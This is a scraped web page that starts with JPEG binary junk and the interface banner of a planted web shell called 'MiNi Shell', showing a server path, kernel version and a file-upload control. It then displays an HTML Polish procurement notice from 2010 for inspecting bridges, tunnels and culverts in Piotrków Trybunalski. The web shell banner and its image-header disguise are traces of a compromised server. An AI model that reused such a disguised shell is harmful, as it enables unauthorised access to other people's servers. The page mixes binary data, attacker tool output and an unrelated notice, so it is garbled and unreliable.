JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100916/294152-N-2010.html

<p class="kh_header"><b>Piotrków Trybunalski: WYKONANIE KONTROLI STANU TECHNICZNEGO OBIEKTÓW INŻYNIERSKICH</b><br>
<b>Numer ogłoszenia: 294152 - 2010; data zamieszczenia: 16.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Dróg i Komunikacji , ul. Belzacka 176, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7339252, faks 044 7329253.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE KONTROLI STANU TECHNICZNEGO OBIEKTÓW INŻYNIERSKICH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kontroli stanu technicznego obiektów inżynierskich (obiektów mostowych, tuneli, przepustów) zlokalizowanych w ciągach dróg publicznych w Piotrkowie Trybunalskim, w tym wykonanie: 
- okresowej kontroli rocznej (tzw. przegląd podstawowy - pp ) dla  20 obiektów,
- okresowej kontroli pięcioletniej (tzw. przegląd rozszerzony - pr ) dla  6 obiektów, 
Przeglądy, o których mowa w pkt.1, muszą spełniać wymagania kontroli obiektów budowlanych, o których mowa w art. 62 ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( t.j. Dz. U. z 2006 r. nr 156, poz.1118 z  późn. zm.) 
Wykaz obiektów inżynierskich, które należy poddać kontroli, zawiera załącznik nr 2 
do wzoru umowy. 
Opis przedmiotu zamówienia oparto na materiałach Generalnej Dyrekcji Dróg Krajowych 
i Autostrad udostępnionych na stronie www.gov.gddkia.pl, w tym na opracowaniu p.n. Instrukcje przeprowadzania przeglądów drogowych obiektów inżynierskich, wprowadzonych do stosowania Zarządzeniem Nr 14 Generalnego Dyrektora Dróg Krajowych i Autostrad z dnia 7 lipca 2005 roku.  
I. OKRESOWA KONTROLA ROCZNA PIĘCIOLETNIA
1.Celem kontroli rocznej i pięcioletniej jest ocena i rejestracja aktualnego stanu technicznego elementów obiektu inżynierskiego, jak również określenie warunków bezpiecznej eksploatacji oraz określenie potrzeb i zakresu niezbędnych robót  bieżącego utrzymania i remontów, W ramach kontroli pięcioletniej należy ponadto ocenić uszkodzenia instalacji i urządzeń umożliwiających użytkowanie obiektu oraz określić przydatność  obiektu  do  użytkowania i ocenić estetykę obiektu. 
2. W trakcie wykonywania kontroli należy sprawdzić stan techniczny elementów obiektu inżynierskiego, stan otoczenia obiektu, instalacji i urządzeń służących ochronie środowiska, oraz zarejestrować zmiany powstałe w czasie użytkowania, takie jak:
a)uszkodzenia obiektu, które mogą spowodować katastrofę budowlaną,
b)uszkodzenia obiektu, które mogą spowodować zagrożenie życia lub                zdrowia ludzi, bezpieczeństwa mienia bądź środowiska,
c)uszkodzenia obiektu, które powinny zostać usunięte w ramach planu               bieżącego utrzymania,
d)uszkodzenia obiektu, które powinny być usunięte w trybie awaryjnym,
e)uszkodzenia instalacji i urządzeń służących ochronie środowiska,
f)uszkodzenia wyposażenia obiektu,
g)uszkodzenia zamocowań lub osłon urządzeń obcych, zagrażających 
bezpieczeństwu użytkowników drogi lub obiektowi inżynierskiemu, (celem wezwania właścicieli urządzeń do przeprowadzenia kontroli  i usunięcia uszkodzeń),
a także określić:
h)warunki bezpiecznego użytkowania obiektu,
i)potrzebę wykonania przeglądu rozszerzonego lub szczegółowego poza harmonogramem przeglądów,
j)potrzebę wykonania ekspertyzy obiektu lub jego elementu,
k)zalecenia wnioskowane,
l)wykaz potrzeb do planu bieżącego utrzymania i remontów,
oraz sprawdzić:  
m)wykonanie zaleceń z poprzedniego przeglądu, 
a w ramach przeglądu rozszerzonego należy dodatkowo sprawdzić i określić:
n)uszkodzenia instalacji i urządzeń umożliwiających użytkowanie obiektu  
o)przydatność obiektu do użytkowania,
p)estetykę obiektu i jego otoczenia.     
3.Wykonanie okresowej kontroli rocznej/pięcioletniej obiektu obejmuje:
a)zapoznanie się z dokumentami ewidencyjnymi i dokumentacją techniczną obiektu,
b)wykonanie oględzin obiektu i jego otoczenia,
c)wykonanie podstawowych badań i pomiarów,
d)wykonanie dokumentacji kontroli, 
e)opracowanie wykazu potrzeb do planu bieżącego utrzymania i remontów, 
4.Oględziny obiektu należy dokonać z poziomu jezdni oraz z poziomu terenu pod obiektem, z zastosowaniem lornetki i ewentualnie drabiny lub rusztowania. W czasie przeglądu rozszerzonego oględziny elementów obiektu należy dodatkowo dokonać z odległości pozwalającej na stwierdzenie uszkodzeń gołym okiem ( t.j. ok. 1 m).
5.Podstawowe badania i pomiary, o których mowa w pkt.4c, obejmują:
a)ostukiwanie młotkiem o masie 0,5 kg,
b)odkuwanie fragmentów skorodowanych warstw, 
c)nawiercanie wybranych fragmentów konstrukcji drewnianej wiertłem O 5 mm,
d)pomiar rozwartości rys,
e)obmiar uszkodzeń sprzętem pomiarowym.
6.Wykonanie dokumentacji kontroli rocznej pięcioletniej obejmuje zapisanie wyników oględzin i badań, dokonanie oceny poszczególnych elementów obiektu i całego obiektu oraz rejestracja wyników w protokołach okresowej kontroli, w tym wykonanie dokumentacji fotograficznej obiektu i uszkodzeń.
7.Protokół okresowej kontroli rocznej pięcioletniej, będący dokumentem potwierdzającym wykonanie kontroli, należy wykonać dla każdego obiektu oddzielnie według załączonych wzorów.  
a)Dla obiektów mostowych - wzór 1a,
b)Dla tuneli i przejść podziemnych - wzór 1b,
c)Dla przepustów - wzór 1c.
8.Inne istotne uwagi dotyczące dokumentacji kontroli:
a)protokół okresowej kontroli powinien mieć nadany numer wg formatu: nr, rok, oraz zawierać dane identyfikacyjne obiektu,
b)uszkodzenia elementów obiektu należy opisać stosując oznaczenia kodowe zawarte w Tabeli 1.  Katalog uszkodzeń elementów, 
c)ocenę poszczególnych elementów należy wpisać w kolumnie Ocena stanu stosując skalę ocen według Tabeli 2. Skala i kryteria oceny elementów; w przypadku izolacji ocenę w skali trzystopniowej (0, 2, 5), stosując zawartą w Tabeli 3. Skalę i kryteria oceny izolacji; oraz Zasady stosowania skali ocen punktowych stanu technicznego i przydatności do użytkowania drogowych obiektów inżynierskich udostępnione na stronie www.gov.gddkia.pl. Jeżeli element nie występuje, w kolumnie Ocena stanu należy wstawić znak-.
d)w wierszu Urządzenia obce należy wpisać uszkodzenia zamocowań i osłon urządzeń obcych, celem wezwania właścicieli tych urządzeń do usunięcia uszkodzeń,
e)w kolumnie Tryb wykonania należy określić tryb wykonania prac stosując czterostopniową skalę pilności, zależnie od potrzeb (A,1,2,3):
-A - prace awaryjne, które należy wykonać niezwłocznie, poza planem bieżącym,
-1 - prace do wykonania w przyszłym roku,
-2 lub 3 -  prace do wykonania w drugiej i trzeciej kolejności.
f)w wierszu stan pogody wpisać jedno z następujących określeń: sucho, mgła, mżawka, deszcz, śnieg.
9.Rodzaje uszkodzeń i nieprawidłowości jakie należy odnotować w protokole okresowej kontroli stanu technicznego: 
a)w części przejazdowej obiektu - jezdnia, chodniki: nieprawidłowe oznakowanie obiektu, nierówności wjazdu na obiekt, deformacje, zarysowania 
i pęknięcia nawierzchni, ubytki, braki lub erozję materiału, zanieczyszczenia, wegetację roślin;
b)w otoczeniu obiektu: ubytki, braki lub erozję materiału, osunięcie mas ziemnych, zanieczyszczenia, bujną wegetację roślin;
c)w elementach nośnych konstrukcji:
drewnianych: ubytki materiału, pęknięcia, deformacje, przemieszczenia, rozluźnienie łączników lub ich brak, korozje biologiczną materiału, starzenie, zanieczyszczenia, wegetację roślin;
stalowych: ubytki materiału, zarysowania i pęknięcia, deformacje, przemieszczenia, uszkodzenia łączników, przecieki, zniszczenie zabezpieczeń antykoroz., korozję materiału, zanieczyszczenia, wegetację roślin;
kamiennych, ceglanych, betonowych: ubytki materiału, zarysowania i pęknięcia,  
deformacje, przemieszczenia, rozluźnienie bloków, ubytki spoin, przecieki, korozja materiału, zanieczyszczenia, wegetację roślin;
żelbetonowych: ubytki materiału, zarysowania i pęknięcia, deformacje, przemieszczenia, przecieki, korozja betonu (np.: osady, wykwity), korozja stali, zanieczyszczenia, wegetację roślin;
z betonu sprężonego: uszkodzenia jak w konstrukcjach żelbetonowych, zarysowania i pęknięcia elementów sprężonych, uszkodzenia zakotwień i/lub cięgien sprężających;
d)w łożyskach i podporach: ubytki materiału, zarysowania i pęknięcia, deformacje, przemieszczenia, zablokowanie lub ograniczenie ruchu, osłabienie spoin podpór murowanych, rozluźnienie łączników w podporach drewnianych, przecieki, zniszczenie zabezpieczeń antykorozyjnych, korozja, starzenie materiału, zanieczyszczenia, wegetację roślin;	
e)w wyposażeniu: ubytki materiału, zarysowania i pęknięcia, deformacje, przemieszczenia, zablokowanie lub ograniczenie ruchu, niesprawność wentylacji, niesprawność oświetlenia lub sygnalizacji, przecieki, uszkodzenie zabezpieczeń antykorozyjnych, korozja, starzenie materiału, zanieczyszczenia;
f)w urządzeniach obcych: uszkodzenia zamocowań, ubytki materiału, deformacje, przemieszczenia, przecieki, uszkodzenie zabezpieczeń antykorozyjnych, korozję materiału. 
g)inne istotne z punktu widzenia bezpieczeństwa ruchu drogowego nie wymienione wyżej.
10.Ocenę stanu technicznego elementów należy dokonać wg  Tabeli 2. 
11.Ocenę izolacji należy wykonać stosując skale i kryteria podane w Tabeli 3.
12.Przez Ocenę średnią obiektu należy rozumieć średnią arytmetyczną ocenę wszystkich elementów ocenianych w czasie przeglądu.
13.Oceną całego obiektu, w przypadku obiektu mostowego, jest najmniejsza z niżej wymienionych ocen:
- ocena średnia obiektu,
- ocena konstrukcji pomostu,
- ocena konstrukcji dźwigarów głównych,
- średnia arytmetyczna ocena przyczółków i filarów, tzn. połowa sumy najniższej oceny przyczółków i najniższej oceny filarów ( dla obiektów jednoprzęsłowych - najniższa ocena przyczółków.
14.Oceną całego obiektu w przypadku tuneli i przejść podziemnych, jest najmniejsza z niżej wymienionych ocen:
- ocena średnia obiektu,
- ocena stanu technicznego sklepienia,
- ocena stanu technicznego ścian,
- ocena stanu technicznego płyty dennej,
- ocena stanu technicznego urządzeń zabezpieczających (odwodnienie, wentylacja).
15.Oceną całego obiektu w przypadku tuneli o konstrukcji mostowej, jest najmniejsza z niżej wymienionych ocen:
- ocena średnia obiektu,
- ocena stanu technicznego stropu,
- ocena stanu technicznego ścian lub podpór,
- ocena stanu technicznego płyty dennej,
- ocena stanu technicznego urządzeń zabezpieczających.
16.Oceną całego obiektu w przypadku przepustów, jest najmniejsza z niżej wymienionych ocen:
- ocena średnia obiektu,
- ocena stanu technicznego konstrukcji obudowy (t.j. ocena płyty górnej lub sklepienia, ścian, płyty dennej i fundamentów, elementów rurowych lub elementów ramowych), 
- ocena stanu technicznego głowic,
UWAGA! - Ocenę średnią obiektu i ocenę całego obiektu należy podać z dokładnością 
do dwóch miejsc po przecinku.
18.W ramach przeprowadzania kontroli okresowych sprawdzić wykonanie zaleceń     
poprzedniego przeglądu.
19. Dla obiektów poddanych okresowej kontroli pięcioletniej dodatkowo określić przydatność  obiektu do użytkowania, w tym określić:
- bezpieczeństwo ruchu publicznego,
- aktualna nośność obiektu,
- dopuszczalna prędkość ruchu pojazdów,
- szerokość skrajni na obiekcie,
- wysokość skrajni na obiekcie,
- skrajnia  światło pod obiektem lub  światło przepustu  usytuowanie przepustu w odniesieniu do potrzeb, oraz opisać estetykę obiektu i jego otoczenia .
20. W wykazie potrzeb do planu bieżącego utrzymania  i remontów należy wyszczególnić rodzaje prac jakie należy wykonać, określić tryb pilności ich wykonania oraz szacunkowy obmiar i szacunkową wartość robót.
SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA ZAWIERA SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności wykonawca musi spełniać następujący warunek:
Wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną pracę 
odpowiadającą zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia  o wartości co najmniej 20 000,00 zł brutto, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie.
Za usługi odpowiadające zakresowi i złożoności porównywalnej z przedmiotem niniejszego zamówienia uznane będą usługi kontroli obiektów inżynierskich - wg załącznika nr 4;
Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności wykonawca musi spełniać następujące warunki:
Wykazać osoby, którymi dysponuje lub będzie dysponował wykonawca i które będą    uczestniczyć w wykonywaniu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wg załącznika nr 3. Osoba, która będzie wykonywać kontrolę stanu technicznego obiektów inżynierskich wymaga się by spełniała równocześnie niżej wymienione wymagania:
a)  posiada uprawnienia budowlane do projektowania lub kierowania robotami budowlanymi bez ograniczeń w specjalności mostowej, albo uprawnienia budowlane do projektowania lub kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno -  budowlanej obejmujące drogowe obiekty inżynierskie.
b)  przynależy do Polskiej Izby Inżynierów Budownictwa
Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą siwz. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności wykonawca musi spełniać następujący warunek:
Opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - minimum na 20 000,00 zł.	
Wykonawca przed podpisaniem umowy dostarczy Zamawiającemu aneks do polisy lub innego dokumentu ubezpieczenia do wartości równej wartości złożonej oferty, 
z wyjątkiem sytuacji, gdy złożona do oferty polisa lub inny dokument ubezpieczenia nie opiewa na tą wartość.
Ocena spełnienia  wymaganych  warunków  odbywa  się,  zgodnie  z  regułą: spełnia albo nie spełnia, na  podstawie  dokumentów  załączonych do oferty, przez Wykonawcę, zgodnych z niniejszą  SIWZ.  Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
